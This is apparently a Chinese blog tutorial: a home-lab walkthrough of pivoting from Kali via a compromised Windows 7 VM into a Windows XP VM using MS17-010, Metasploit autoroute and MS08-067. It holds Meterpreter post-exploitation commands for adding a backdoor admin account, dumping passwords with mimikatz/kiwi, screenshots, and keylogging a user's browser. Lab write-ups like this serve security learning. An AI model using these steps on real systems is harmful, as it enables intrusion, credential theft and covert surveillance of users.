跨网段攻击+MS08-067漏洞复现

2,634 阅读7分钟

跨网段攻击+MS08-067漏洞复现

跨网段攻击

之前的实验是在一个网段内进行攻击。今天,我们来练习跨网段攻击。

什么是跨网段攻击呢?

image.png

我给了上面一张图,帮助大家理解。

小帅跟我是同一个网段,是可以互相连接的,但是小帅不让他弟弟小强和别人玩,怕被带坏,影响学习。

因此,小帅跟小强使用另一个网段单独组建了一个局域网,用来发送学习资料,这个时候,由于我和小强 不在同一个网段,没办法直接和他“做朋友”

就可以利用小帅当跳板,来和小强“交个朋友”

跨网段攻击差不多就这个意思

话不多说,开始实战!

配置实验环境

我的电脑

  • 操作系统:Kali-Linux-2021
  • 网络:NAT模式(网络地址转换,让内部局域网络能够访问互联网的)
  • IP:10.10.10.128
  1. 更改虚拟机设置网络适配器为NAT模式
image.png

2.在VMware的编辑中打开虚拟网络编辑器

image.png

3.在虚拟网络编辑器中点击更改设置后选择NAT模式

image.png

4.设置子网IP,这里设置为10.10.10.0,然后点击应用、确定

image.png

5.然后打开我的kali虚拟机啊,发现右上角网络已经连接

image.png

6.鼠标右键点一下,选择连接信息就可以查看本机的网络配置了(我们也可以打开终端输入ifconfig查看)

image.png

7.然后,问题来了,我明明改的子网是10.10.10.0,这里怎么是10.0.0.3呢

image.png

8.原来是因为我之前是手动配置的IP地址来进行实验的,那么现在我们来简单调整一下吧

右击选择编辑网络

image.png

9.打开后双击我们的网络连接1

image.png

10.点击IPv4设置,可以看到我之前是手动配置的IP,现在点击Method后面的Manual(手动)切换成Automatic(DHCP)自动获取IP地址,然后点击下面的10.0.0.3,选择右边的Delete(删除)(好像不删除它先选用手动配置的IP),最后点右下角的save(保存)

image.png image.png

11.之后查看网络信息就可以发现给我们自动分配的IP地址变成了10.10.10.128(没变的可以试着关机重启或者点击VMware软件右下角网络适配器NAT选择断开连接然后重新连接)

image.png

通过上述操作,我的攻击主机已经配置完毕,接下来配置小帅的环境

小帅的电脑

  • 操作系统:Windows7
  • 网络1:NAT IP:10.10.10.129
  • 网络2:VMnet1 IP:192.168.80.128

1.小帅有两个网络连接,一个用于连接互联网,浏览丰富资源,可以和我连通,一个用来和弟弟小强组成局域网发送信息。这里的第一个网络适配器选用NAT,用于上网;第二个选择VMnet1(仅主机模式)ps:大家随便选一个,我这里1-7应该都是可以的,但是选了之后要在虚拟网络编辑器里添加对应的VMnet

image.png image.png

2.可以看到虚拟网络编辑器中VMnet8之前改过了,进去会自动分配IP,现在我们改一下VMnet1的子网

image.png image.png

3.由于我之前手动配置的IP,现在进去没有给我分配,那我就要重新设置一下了,首先右击网络,打开网络和共享中心,选择更改适配器设置

image.png

4.右击本地连接,选择属性

image.png

5.双击IPv4,进行配置

image.png

6.选择自动获得IP地址和DNS服务器地址

image.png

7.把确定点完,发现我们的电脑已经可以上网啦!

image.png

8.接下来配置本地连接2,打开IPv4配置,我们选择自动获取。

image.png

接下来点确定保存好IP,小帅的环境就搭建好啦!

image.png

小强的电脑

  • 操作系统:Windows XP
  • 网络:VMnet1
  • IP:192.168.80.129

1.虚拟机设置网络适配器为跟哥哥小帅一样的VMnet1虚拟局域网

image.png

2.右击,打开网络连接

image.png

3.选择properties属性

image.png

4.双击TCP/IP进行配置,选择自动获取

image.png

5.按OK保存

此时小强的环境也配置好了,接下来就可以开始真正的跨网段攻击了!!!

image.png

开始攻击!!

使用MS17-010漏洞攻击小帅,获取小帅的主机权限

  • 成功攻击小帅,进入到我们的meterpreter界面
image.png
  • 输入命令,查看当前权限,权限不够的话需要提权,可以看到现在已经是管理员权限
getuid
image.png
  • 输入shell,进入Windows7的命令行界面,发现有乱码
shell
image.png
  • 编码格式的问题,这里输入chcp 65001(改变当前活动代码页为UTF-8,让当前的批处理窗口支持UTF-8格式的文件),发现问题解决,绝大部分都能看懂了。然后输入ipconfig,发现了小帅的第二个IP
chcp 65001
ipconfig
image.png
  • 输入命令,查看IP地址的ARP缓存项,发现我们自己的IP了,后面是动态连接的,再看下刚才发现的另一个IP192.168.80.128,发现有个IP也是动态连接的
arp -a
image.png
  • 我们和这个IP无法直接连接,于是我们就可以进行跨网段攻击来入侵小强的电脑了

  • Ctrl+c键返回我们的meterpreter界面

image.png
  • 使用autoroute脚本将内网网段192.168.80.0/24添加到我的路由表,输入命令查看是否添加
run autoroute -s 192.168.80.0/24
run autoroute -p
image.png
  • 添加成功,然后输入命令将meterpreter终端隐藏在后台,我们就可以对小强开始攻击啦!
background
image.png

MS08-067漏洞复现攻击小强

环境

  • 攻击机:Kali-Linux-2021 IP:10.10.10.128
  • 靶机:Windows XP IP:192.168.80.129

工具

  • Metasploit
  • Meterpreter

开始攻击

  • 这里知道目标主机是XP系统,我们选择使用MS08-067漏洞进行攻击
image.png
  • 查看配置参数,发现需要填目标主机,同时我们注意到载荷采用的是tcp反向连接,由于小强是内网,无法连接我们,因此我们需要采用正向连接
image.png
  • 设置载荷
set payload windows/meterpreter/bind_tcp
  • 设置受害者IP
set rhosts 192.168.80.129
image.png
  • 检查无误后开始攻击,攻击成功,进入meterpreter终端
run
image.png

MS08-067漏洞防范

  1. 关闭相关端口(445)
  2. 安装杀毒软件和补丁
  3. 防火墙进行流量监测

到这里我们的跨网段攻击就完成啦!!!小强也是我们的好朋友了!

后渗透攻击小帅

远程桌面连接

  • 将与小强连接的meterpreter会话放在后台,连接之前与小帅的会话
image.png image.png
  • 进入shell界面,创建账号“猜猜我是谁”,并将它设置为管理员
net user GuessWhoami 5201314 /add
net localgroup administrators GuessWhoami /add
image.png
  • 然后我们再打开一个终端使用远程桌面连接小帅,选择yes
rdesktop 10.10.10.129
image.png
  • 然后使用我们的新账号登录,成功!
image.png image.png
  • 这个时候,我突发奇想,那我岂不是可以用小帅再远程桌面连接小强
U((GHGON2PGOR195UY}CIE4.png Y~}0@~_E0[9KMVFK6T~2YI3.png

由于我们前面已经成功跨网段攻击了小强,获取账号、创建账号是很容易的,后续操作就不演示了

使用mimikatz抓取保存在内存的密码

  • meterpreter里面是内置有mimikatz的,我们直接启用就行,但是我们发现这个工具已经被取代啦,现在的kiwi是更好的
load mimikatz
image.png
  • 我们第一次见,不会用,那就查看帮助
help kiwi
image.png
  • 哈哈哈哈,还是看不懂,看不懂就一个一个试!账户密码不就出来了嘛!
image.png

桌面截屏、键盘监听

  • 桌面截屏,这个很简单了,上次已经做过了,让我们看看他在干嘛
screenshot
image.png image.png
  • ?!!什么!!!不学习在上网!赶紧键盘监听,看他要干嘛
  • 输入ps查看进程
ps
image.png
  • 找到对应的程序,这里我们找到谷歌和对应的PID,输入命令
migrate -P 1568
image.png
  • 接下来开启键盘监听,等待小帅输入
keyscan_start
image.png
  • 估摸着差不多了,输入命令看看小帅搜的什么
keyscan_dump  \\获取监听
keyscan_stop  \\停止监听
image.png
  • 怎么追求一个女孩子?我们的小帅同学已经春心萌动了吗?不是说好一起好好学习的吗?小帅啊小帅!

由于小帅的电脑有问题,未能安装好摄像头,很遗憾没有拍下小帅的帅照(T^T)

声明

以上内容仅代表作者个人观点,本文仅作为网络安全学习参考,作者不承担任何法律责任。